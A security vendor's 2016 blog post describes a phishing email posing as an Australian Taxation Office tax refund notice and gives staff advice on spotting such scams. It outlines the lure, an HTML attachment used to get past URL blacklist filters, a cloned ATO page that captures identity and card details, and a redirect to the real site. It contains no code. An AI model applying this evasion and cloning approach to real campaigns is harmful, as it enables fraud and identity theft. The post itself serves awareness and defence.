Richard Price 05 January 2016 10:43:15 AEDT 4 MIN READ

New Year, New Phishing ATO Email Scam

Cyber criminals have launched yet another phishing ATO email scam, which MailGuard has successfully identified and blocked.

In a similar vein to another recent ATO scam, it attempts to fool tax payers into thinking they’re entitled to a tax refund, in the hope of stealing sensitive personal information.

Below is an example of the email you should look out for:

















The email’s subject ‘You have received a tax refund’ is designed to immediately catch the reader’s attention, particularly after an expensive Christmas and holiday period when the promise of a rebate is likely to be most welcome.

As you can see the email appears to be sent from the Australian Taxation Office, with an official header logo used to increase a sense of legitimacy.

This ATO email scam employs sophisticated social engineering techniques to prompt a rapid response from readers, claiming that failure to submit the correct details in time could lead a delay in the rebate payment.

In a change from most phishing emails which often contain grammatical errors, this tax refund scam is particularly well written, further strengthening its legitimacy.

The scammers encourage readers to download an HTML file contained within the body of the email, in order to complete a ‘Tax Refund Form’.

Once the reader has double clicked on the file, it saves itself to a temporary directory on their computer before opening as a web page within an internet browser, as shown below.

By inviting users to access a web page through an HTML file, rather than through a direct URL link, cyber criminals are hoping to bypass spam filters which scan links in emails against a security vendor's URL blacklist.


As you can see, the cyber criminals have used a sophisticated website cloning application to create a direct replica of the ATO’s official website.

Closer inspection of the webpage URL should immediately warn readers that this page is illegitimate – it contains no reference to the Australian government, whose web addresses always end in

The form encourages readers to fill in a range of personal information, including their date of birth, full name and credit card details, which are then captured once the blue “Log on” button has been clicked.

More vigilant recipients would be wary of a website that asks them to “Log on” without asking for username or password credentials, something generally expected from a legitimate service.

Users are finally redirected to the official ATO website, giving the impression that the process has been completed successfully and legitimately. In the meantime, cyber criminals now have access to personal details used to steal a recipient’s identity and appropriate funds.

Protecting yourself from phishing emails

Protection against phishing emails like this tax refund scam require a two-tier approach - firstly through prevention, and secondly through education.

The most important protection measure is to ensure that phishing emails don’t reach you in the first place. A premium cloud email filter will scan your emails against a range of spam criteria, detecting and blocking campaigns like this tax refund scam before they reach you.

Because cloud-based email filters can be updated immediately, without having to download a patch, you’ll be protected against new varieties of phishing scams, and the use of new techniques, in real time.

The second step is through education, so it’s important that you encourage staff not to open emails that:

  • Appear to be sent from a reputable firm, but are not addressed to you by name
  • Include a call to action that urges you to act quickly
  • Ask you to enter personal information that they should already have access to, particularly when the site looks suspicious.
  • Take you to a landing page with an unofficial-looking URL.

Please be aware that the ATO will not send emails asking you to submit personal details - you should call them directly if you are unsure of the legitimacy of any of their communications. We recommend that you share our blog with staff members in order to educate them on how to look out for an attack.

Keep up-to-date on the latest email scams by subscribing to MailGuard’s weekly update or follow us on social media.

Keep Informed with Weekly Updates